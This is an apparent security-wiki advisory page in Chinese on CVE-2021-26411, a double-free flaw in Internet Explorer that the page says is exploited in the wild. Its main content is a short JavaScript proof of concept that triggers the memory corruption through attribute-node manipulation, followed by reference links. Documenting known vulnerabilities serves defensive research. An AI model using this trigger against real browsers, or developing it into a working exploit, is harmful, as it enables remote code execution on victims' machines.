menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right Internet Explorer内存损坏漏洞(CVE-2021-26411).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Internet Explorer内存损坏漏洞(CVE-2021-26411).md
    1 KB / 2021-05-21 09:14:38
        # Internet Explorer内存损坏漏洞(CVE-2021-26411)


Interne Explorer在处理DOM对象时,存在一处double free漏洞,攻击者可通过诱导用户点击恶意链接或文件来利用此漏洞,此漏洞可导致远程代码执行,从而使攻击者控制用户系统。该漏洞细节已公开,并检测到在野利用。

漏洞详情可以参考:https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html

PoC:


```js
<script>
var elem = document.createElement('xxx'); 
var attr1 = document.createAttribute('yyy'); 
var attr2 = document.createAttribute('zzz'); 

var obj = {};
obj.valueOf = function() {
        elem.clearAttributes();
        return 0x1337;
};

attr1.nodeValue = obj;
attr2.nodeValue = 123;
elem.setAttributeNode(attr1);
elem.setAttributeNode(attr2);
elem.removeAttributeNode(attr1); 
</script>
```

ref:

* https://msrc.microsoft.com/updat ... lity/CVE-2021-26411
* https://nvd.nist.gov/vuln/detail/CVE-2021-26411
* https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html
    links
    file_download